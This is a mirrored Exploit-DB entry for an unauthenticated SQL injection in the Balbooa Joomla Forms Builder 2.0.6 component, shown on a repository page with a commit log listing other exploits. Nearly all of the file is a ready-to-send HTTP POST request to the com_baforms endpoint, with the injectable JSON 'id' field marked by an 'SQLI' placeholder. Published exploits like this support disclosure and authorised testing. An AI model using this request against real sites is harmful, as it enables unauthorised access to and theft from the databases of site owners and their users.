bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50447.txt
Offensive Security 358c35770a DB: 2021-10-26 
17 changes to exploits/shellcodes

Netgear Genie 2.4.64 - Unquoted Service Path
OpenClinic GA 5.194.18 - Local Privilege Escalation
Gestionale Open 11.00.00 - Local Privilege Escalation

Hikvision Web Server Build 210702 - Command Injection
WordPress Plugin TaxoPress 3.0.7.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)
Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)
Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)
Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS)
Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
Engineers Online Portal 1.0 - 'multiple' Authentication Bypass
Engineers Online Portal 1.0 - 'id' SQL Injection
WordPress Plugin Media-Tags 3.2.0.2 - Stored Cross-Site Scripting (XSS)
WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)
Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)
phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
2021-10-26 05:02:12 +00:00

56 lines
No EOL
1.7 KiB
Text
Raw Blame History

# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
# Date: 24.10.2021
# Exploit Author: blockomat2100
# Vendor Homepage: https://www.balbooa.com/
# Version: 2.0.6
# Tested on: Docker
An example request to trigger the SQL-Injection:
POST /index.php?option=com_baforms HTTP/1.1
Host: localhost
Content-Length: 862
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035
Connection: close
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="1"
{"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}}
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="form-id"
1
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="task"
form.message
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="submit-btn"
2
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-title"
Home
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-url"
http://localhost/
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-id"
0
------WebKitFormBoundaryTAak6w3vHUykgInT--
Reference in a new issue View git blame Copy permalink